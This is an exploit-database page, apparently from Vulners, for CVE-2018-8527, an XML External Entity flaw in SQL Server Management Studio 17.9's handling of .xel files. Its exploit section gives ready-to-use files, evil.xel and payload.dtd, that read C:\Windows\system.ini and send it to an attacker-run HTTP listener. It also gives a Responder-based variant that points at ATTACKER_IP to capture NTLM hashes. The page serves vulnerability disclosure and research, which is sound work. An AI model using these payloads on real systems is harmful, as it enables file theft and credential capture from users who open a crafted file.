Lucene search
K

Microsoft SQL Server Management Studio 17.9 - .xel XML External Entity Injection

🗓️ 11 Oct 2018 00:00:00Reported by hyp3rlinxType 
exploitpack
 exploitpack
👁 58 Views

Microsoft SQL Server Management Studio 17.9 '.xel' XML External Entity Injection allows information disclosure through malicious file access

Related
Code
# Exploit Title: Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection
# Date: 2018-10-10
# Author: John Page (aka hyp3rlinx)	
# Website: hyp3rlinx.altervista.org
# Venodor: www.microsoft.com
# Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4)	
# CVE: CVE-2018-8527
# References:
# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XEL-FILETYPE-XML-INJECTION-CVE-2018-8527.txt
# https://www.zerodayinitiative.com/advisories/ZDI-18-1131/
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527
# The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527) 

# Description
# This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations 
# of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability 
# in that the target must visit a malicious page or open a malicious file.
# The specific flaw exists within the handling of XEL files. Due to the improper restriction 
# of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser 
# to access the URI and embed the contents back into the XML document for further processing. An attacker 
# can leverage this vulnerability to disclose information in the context of the current process.

# [Exploit/POC]

python -m SimpleHTTPServer (listens Port 8000)

"evil.xel" (Extended Event Log File)

<?xml version="1.0"?>
<!DOCTYPE flavios [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

"payload.dtd"

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;

# OR 
# Steal NTLM hashes
# Kali linux

/usr/share/responder/tools

responder -I eth0 -rv

"evil.xel"

<?xml version="1.0"?>
<!DOCTYPE dirty0tis [ 
<!ENTITY % dtd SYSTEM "\\ATTACKER_IP\unknown">
%dtd;]>

Result: Forced authentication and NTLM hash captured

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Oct 2018 00:00Current
6Medium risk
Vulners AI Score6
EPSS0.23373
58